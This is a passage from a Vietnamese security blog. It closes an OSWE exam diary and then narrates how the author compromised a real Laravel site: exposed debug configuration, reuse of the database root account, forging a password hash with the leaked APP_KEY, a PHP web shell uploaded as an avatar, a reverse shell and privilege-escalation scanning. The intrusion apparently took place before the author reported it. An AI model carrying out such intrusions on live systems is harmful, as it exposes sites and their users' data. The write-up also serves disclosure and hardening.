Ăn xong cũng đã 22h tối, Tôi quay lại làm tiếp bài 1 cho phần RCE, thừa thắng xông lên, tôi chỉ mất 1 tiếng để có được RCE lúc đó là 23h đêm. Submit flag viết poc để có thể khai thác từ đầu đến cuối cho bài 1. Viết xong POC đã là 23h30, Tôi nghĩ nên hoàn thành bài thi của Tôi càng sớm càng tốt, để còn dành thời gian xem lại một lượt chụp đầy đủ ảnh còn viết bài cáo, nên tuy khuya rồi nhưng vẫn mở bài 2 lên tiếp tục try hard.

Bài thứ 2 quá là thuận lợi khi mà tầm 3h sáng ngày 24/01/2021 tôi đã có thể bypass authen, tức là mất khoảng 3 tiếng để làm nó.

Sau đó gần 2 tiếng, tức là gần 5h sáng ngày 24/01/2021 tôi đã RCE được máy thứ 2, lúc đấy đã quá mệt, nên tôi submit flag và đi ngủ.

Đi ngủ đâu đấy gần 10h sáng dậy, đánh răng rửa mặt, ăn uống, thong thả và quay lại bài thi để viết poc một cách chỉnh chu và kiểm tra lại screenshots xem còn thiếu bước nào không.

Bắt đầu viết báo cáo sơ lược để đảm bảo có thể nhớ được những gì Tôi đã làm sau khi hết thời gian thi, cũng như hỗ trợ cho phần báo cáo chi tiết gửi tới Offensive Security.

Viết báo cáo

Đến đây là ngày thứ 3, lúc mà kết nối VPN đến bài thi đã hết thời gian, bây giờ Tôi phải ngồi viết lại báo cáo một cách chi tiết về cách tìm ra lỗ hổng, cách khai thác, cũng như POC có thể chạy để khai thác từng bài. Nói chung là viết report cung cấp tất cả các thông tin trong các yêu cầu của đề thi mà OSWE cho.

Báo cáo phải viết càng chi tiết các bước càng tốt, làm sao để một người không biết gì về kỹ thuật cũng có thể làm lại theo báo cáo 1 cách step by step mà ra được kết quả đúng, thì lúc đó báo cáo của bạn mới được chấp nhận. Đã có trường hợp thi làm được 100% các máy nhưng cũng trượt vì báo cáo không OK rồi đấy, nên các bạn chú ý nha.

Viết xong thì gửi như hướng dẫn của Offensive Security là được. Bây giờ là ngồi hồi hộp chờ thông báo passed thôi.

Tóm lại

Lúc học, các bạn phải notes những gì đã học, đến lúc vào thi mà phải đi search google thì oải lắm =))

Các POC script bạn viết cho quá trình làm extra miles thì nên lưu lại một cách dễ nhớ nhất, có thể trong bài thi sẽ dùng tới, nó không phải là sử dụng 100% nhưng nó có thể giúp bạn có được ý tưởng viết POC cho bài thi một cách nhanh nhất.

Bài thi yêu cầu bạn phải kết hợp logic được tất cả các lỗ hổng lại với nhau và viết 1 poc khai thác tất cả các lỗi bằng từ đầu đến cuối trong 1 poc duy nhất bằng: python, c, ... hoặc bất kỳ ngôn ngữ script nào bạn thành thạo. Nên là bạn nên học thành thạo 1 ngôn ngữ script nào đó để viết POC cho nhanh nha.

Thời gian của bài thi là 48h nhưng Tôi nghĩ nếu các bạn giác ngộ được cách khai thác lỗi dạng whitebox rồi thì 48h thi là quá đủ.Tôi thì cũng chả giỏi dang gì lắm cũng có thể hoàn thành nó trong chưa đầy 26h và thời gian còn lại là dành thời gian cho việc kiểm tra lại POC cũng như screenshots.

Lúc thi phải giữ 1 cái đầu bình tĩnh, nếu ngày đầu tiên chưa làm ra được gì thì nhiều lúc cũng ko cần phải căng thẳng quá, cứ ăn, uống, ngủ, nghỉ thoải mái nhất có thể - cứ như một ngày bình thường thôi. Lúc nào cảm giác tâm trạng tốt thì quay lại thi tiếp. Đừng như Tôi thức đêm thức hôm, từ hôm thi xong đến giờ Tôi ho SML chỉ vì thức xuyên đêm =))

Viết báo cáo phải đủ, chi tiết các bước, để một người khác có thể thực hiện lại và ra kết quả đúng.

4. Kết luận

Khóa học rất OK, nên các bạn có ý định học để thi lấy chứng chỉ, cũng như các bạn có hứng thú học để tiếp thu kiến thức mới thì cứ mạnh dạn đăng ký học.

OSWE khó? Tùy quan điểm mỗi người tuy nhiên đối với Tôi ban đầu chưa thi, chưa học thì cũng nghĩ nó khó vì Tôi đọc review thấy toàn bài có cert này cert nọ vẫn tạch, run lắm, sợ lắm, nhưng cũng thi được, thì theo Tôi thấy là bình thường.

Lúc học cố gắng try harder hết tất cả các bài extra miles của AWAE đưa ra, tốt nhất là không bỏ lỡ bài nào, vì có thể phần bạn bỏ lỡ chính là phần bạn sẽ gặp lúc thi. Nhớ lưu lại POC của extra miles đã làm nữa nhé.

Bài thi giống như một cuộc thi chạy marathon, không phải là một cuộc thi chạy nước rút nên các bạn cứ từ từ mà làm, vì trong 48h thi mà OSWE đưa ra, họ đã tính toán cho bạn cả giờ ăn, uống, ngủ nghỉ, sinh hoạt rồi.

Đã có trường hợp làm được bài thi nhưng trượt vì báo cáo, nên phần báo cáo cũng là một phần quan trọng.

Một số trang tài liệu Tôi hay đọc trong lúc học OSWE:

https://book.hacktricks.xyz/
https://klezvirus.github.io/Advanced-Web-Hacking/
... Tạm thời quên, nào nhớ ra Tôi sẽ update tiếp vào đây

⇒ Thời điểm viết bài, Tôi cũng không thể nhớ hết một số thứ Tôi muốn truyền đạt được, nên là bài viết này Tôi sẽ luôn update nếu như nhớ ra vấn đề gì.

Cuối cùng, cảm ơn các bạn đã đọc bài của mình, nếu như các bạn có yêu cầu thì mình sẽ viết một phần về cách học như thế nào nữa, nhé nhé.

Chỉ một buổi chiều, Tôi đã chiếm quyền điều khiển server của 8 website như thế nào?

Manhnv — Fri, 15 Jan 2021 17:00:00 GMT

Xin chào, xin chào các bạn. Lâu lâu lâu lắm rồi mình mới có thời gian để viết bài, vì bận quá (thực ra là vì lười quá).

Chuyện là gần đây mình có hay lượn lờ đọc mấy bài về lập trình web (lại là câu chuyện về web đấy các bạn). Thì mình cũng chiếm được cái server nho nhỏ của 1 website (Tại sao tiêu đề là 8 mà đây mình lại ghi là 1, thì xem hồi sau sẽ rõ).

Mình đã xin phép bên kia rồi mới viết bài nhé Nhưng để giữ bí mật cho họ thì mình sẽ che tên web cũng như các thông tin nhạy cảm nhé, từ giờ mình sẽ dùng domain web đó là https://xxxx.com nha.

Dạo chơi vớ phải bug

Mình có lên 1 vài trang đọc về lập trình thì vô tình vớ được 1 trang web của 1 bên dạy lập trình, thì mình cũng dạo xem họ có khóa gì thú vị không.

Mình truy cập vào https://xxxx.com, dạo một vòng. Đang dạo thì mình dừng lại chuột phải inspect thử 1 cái ảnh xem đường dẫn ảnh như nào. Thực ra là bệnh nghề nghiệp.

Tôi thử truy cập vào https://portal.xxxx.com xem thử nó là cái gì nha, nhìn cũng có vẻ được đấy. Nhưng khi truy cập vào thì nó yêu đầu đăng nhập.

Đến đây tôi tự hỏi: Có cách nào đăng nhập được vào không ta, đăng nhập vào không biết có gì ha? Những câu tự hỏi đó làm tôi càng tò mò hơn, quyết định tìm cách đăng nhập được vào trang này.

Mình thấy có đường dẫn ảnh lúc nãy là như này:

https://portal.xxxx.com/laravel-filemanager/photos/shares/Course/1_y6C4nSvy2Woe0m7bWEn4BA.png

Truy cập thử xem nào. À ha, trả về cái ảnh là đúng rồi nè.

Tuy nhiên tính tò mò nên tôi thử sửa đổi URL đi một tý, đó mà tôi lược bỏ tên file ảnh đi, nó chỉ còn vầy thôi https://portal.xxxx.com/laravel-filemanager/photos/shares/Course/

Thì ôi thôi, một tuyệt tác như vầy:

Vậy là tôi đã có thông tin:

Web dùng laravel
Không tắt đi debug
Vì không tắt DEBUG nên config gì của laravel là biết tuốt, biết tuốt

Mà mới gần đây laravel còn có quả lỗi mới liên quan đến cái DEBUG khỉ gió này, là Laravel <= v8.4.2 debug mode Remote code execution => Thực ra đến đây thì tôi đã có thể đi đến chiếm quyền server rồi, nhưng mà nó không thú vị lắm, bởi vì chẳng qua ăn may là web này bật DEBUG thôi, chứ những web khác không bật DEBUG thì chiếm kiểu gì? Nên là tôi tiếp tục tìm vector khác.

Thế thì như đã nói là website này bật DEBUG mode nên là show hết các thông tin cấu hình của web rồi: Thông tin truy cập database, các auth key của các dịch vụ nó dùng, ip thật, APP_KEY ... (Trong này có cái APP_KEY, tý tui sẽ biểu diễn đường quyền sau nha)

Database họ dùng tài khoản root luôn Thế là dở rồi bạn ơi, môi trường production mà không tắt DEBUG, lại dùng tài khoản root cho database là dở rồi

⇒ Đến đây, database connect được rồi, user của database là root rồi, thì đoạn này lợi dụng mysql để RCE vẫn là ok rồi, có điều như đã nói: Trong nhiều trường hợp, sẽ không có chuyện may mắn như thế này, nên tôi vẫn đi tìm vector tấn công khác ngon hơn mà không cần dựa vào may mắn.

Khám phá thử database

Có Thông tin database thì tôi vào xem thế nào nha, thú vị nha.

Gòy xong luôn =))

Count nhẹ cái database của portal thì cũng có trên 1200 tài khoản học viên đấy, là đông đấy, không ít đâu

Trừ cái database information_schema và mysql của mysql ra thì trên này tôi đếm được 8 cái database của 8 cái website khác nhau các ông ạ, ác dữ vậy.

Rồi, giờ đến lúc biểu diễn đường quyền với APP_KEY có nhắc phía trên này. Vì tôi từng lập trình laravel, nên tôi biết nó dùng APP_KEY để làm KEY cho các hàm hash password của nó, vậy thì thử tạo cái hash password xem nào.

Tạo password bypass authen truy cập vào xem ứng dụng dư lào.

Tạo một project laravel để test.

Sau khi tạo xong project thì vứt cái APP_KEY vô file .env

Rồi tạo hash password thôi nào

Chạy lên xem để lấy hash nha.

Đấy, các bạn thấy có OK không ạ? Hơi ngu hơi thủ công nhỉ :v nhưng làm cho vui nên làm thế thôi.

Bây giờ thì cầm cái hash đó thay vào một user bất kỳ trong database nha, nhưng mà để cho không bị lộ thì mình tìm cái user nào mà từ lâu rồi không login ý.

Thứ 1: Đổi password hash trong database

Thứ 2: là chuyển cái trường check_lock_account về 0

Bây giờ có tài khoản rồi đó, tài khoản là email mà mình đổi hash password, còn mật khẩu là 123456.

Thử đăng nhập vào portal nào, xem nào, xem nào. Hồi hộp quá.

⇒ OK rồi nhá, đăng nhập được rồi nhá, easy chưa. Đây vẫn là cú bypass ngu người dựa vào may mắn bên trên (Tôi viết cho có nội dung thôi, chứ hồi sau mới thực sự hấp dẫn nha). Đó chỉ là tôi thử để xem database họ lưu trữ cái gì thôi. Thực ra tôi có cách bypass authen ngon hơn ở phía dưới. Tiếp tục đọc bài viết, hồi sau sẽ rõ.

Có được account đăng nhập dễ dàng hơn.

Mình thật sự ngu ngốc, bypass thôi cũng làm ngu. hahaha

Thực ra thì trong cuộc sống ít khi mà hên gặp cái server nào nó để DEBUG thế lắm, nên việc chỉnh sửa trong database nó là case hiếm hoi. Nhưng mình có cách khác để có account dễ hơn.

Sau một hồi dạo quanh quẩn ở https://xxxx.com thì mình phát hiện web này có chức năng đăng ký khóa học, mà khi đăng ký xong nếu tài khoản chưa tồn tại trên hệ thống thì nó tự tạo tài khoản cho mình và mật khẩu được gửi vào mail, thế thì mình đăng ký thử nha.

Đăng ký khóa học để xem nha.

Đăng ký thành công này, và chờ mail gửi về này.

Mail gửi về cho mình tài password đăng nhập nè. OK, vậy là đã có tài khoản đăng nhập này,

Đó, đó, Easy chưaaaaaa?

Upload shell

Có được tài khoản đăng nhập rồi, giờ thì lượn lờ web xem như nào, thì mình hứng thú với chức năng upload file trong Cài đặt tài Khoản

Thử upload 1 file không phải là ảnh thì nhận được thông báo lỗi

Ok, ok, giờ bật Burpsuite lên và thực hiện upload file lại xem. Thử 1 file đúng các định dạng trên thì thành công.

Bây giờ thử upload shell lên thử nha, web kia là php-laravel nên mình làm tý shell là php nha, chuyển Burpsuite qua repeater nào.

Á kìa, vẫn thành công - tức là không filter phía server. Thiệt luôn á, mấy ông tõi code website này lười thiệt chứ, đã lỡ filter client rồi thì filter luôn server đi cho nó có đôi có cặp, như này là hỏng cả bánh kẹo rồi. Server nó trả về thành công thì coi như tôi cũng thành công 85% các ông ạ =))

Thử quay lại browser xem avatar chứ hả =))

Image Avatar nó load lên bị lỗi này mấy má ơi, inspect lên xem nha.

WOW, see, see, you see? Còn gì nữa đâu mà khóc với sâu, thử truy cập vào đường dẫn thử xem.

Đã bảo là không Còn gì nữa đâu mà khóc với sầu. Shell lên và thực thi được đây rồi thây =))

Đao to búa lớn với reverseshell

Thì giờ thực thi command trên browser bất tiện nên là reverseshell nó về máy cho nó dễ thao tác.

Kiếm con server có ip public nhé. Nc cho nó port 8001 nè

Tạo cái payload này

Chạy cái payload này

Nhận cái shell về nè

Sau khi reverseshell về được rồi, thì mình thử dùng Linpeas để scan xem có vector nào Privilege Escalation lên root được trên server này không.

(link đây: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)

Thì ta nói, nó vô vàn cách để lên root từ con server này các ông ạ, khoan nói về các cách phức tạp thì cũng thấy đập vào mắt luôn là quả server kernel version cũ, có đầy exploit trên https://www.exploit-db.com/.

Giờ thì server này là của mình, nghịch thôi, phá thôi.

ĐÙA ĐẤY, report cho bên họ thôi

Ơ thế thì cũng chỉ mới 1 website thôi, lấy đâu ra 8 website?

Thì thật ra có đoạn tôi quên kể là khi tôi reverseshell về rồi đó, tôi thử ls cái folder /var/www/html ra xem như nào, thì nó có tận 8 cái website trên đó mà những web đó đều đang chạy cả, có 1 số 8 website đó là trang quản lý task của công tý đó luôn, nhưng thôi tôi lương thiện mà, nên dừng ở đây report cho họ là được rồi

Kết luận

Nói chút qua timeline.

Chiều 13/01/2021 (dương lịch): Tìm ra lỗi.
Cũng trong chiều hôm ấy 13/01/2021: Viết report và gửi cho bên quản lý website
Và chỉ hôm sau thôi (14/01/2021): Bên kia liên lạc lại với mình để confirm lỗi.
Ngày 15/01/2021: Họ xác nhận đã fix xong lỗi, nhờ mình kiểm tra hộ có còn tồn tại lỗi không và mình có nhân tiện đó xin phép viết bài writeup luôn cho vui.
... Đấy sự kiện tiếp theo thì thôi khỏi kể nha 😋

Cuộc sống nhiều khi vô tình và đưa ta đến những điều thú vị, và bài viết này là một ví dụ như thế: Tôi vô tình chiếm được website trên mạng nên mới vô tình viết bài này chứ không tôi ở ẩn vài năm nữa các bạn ạ =)) Lạnh cóng tay, nên lười lắm.

Qua bài này thì cũng cảnh báo cho các bạn lập trình viên cũng như quản trị server vài thứ luôn nhé:

Trên môi trường production thì đừng có mã lỡ tay bật DEBUG lên
Tài khoản database thì nên tạo một tài khoản hạn chế quyền dành riêng cho từng ứng dụng web khác nhau, đừng mang ông root ra mà chạy như thế.
Các bạn lập trình thì filter cẩn thận vào, filter mỗi client thôi thì chỉ đánh lừa được người dùng bình thường thôi, gặp mấy ô thích chọc ngoáy là dở đấy.
Nên nâng version kernel server thường xuyên đi nha, và bớt chạy các service dưới quyền root đi.
... Nhiều điều còn muốn nói lắm, cơ mà cái thói lười nó lại đến, nên thôi nhé.

\======> Chiếm cái server này nó còn dễ hơn là chơi mấy bài CTF nữa

Cuối cùng, cảm ơn tất cả các bạn đã bỏ thời gian đọc bài viết của mình. Đợt này mình sẽ quay trở lại để viết blog, và mình có một series về OSWE có vẻ cũng hay. Hãy chờ đợi series học OSWE của mình sắp tới nhá, chắc chắn sẽ trước tết nè.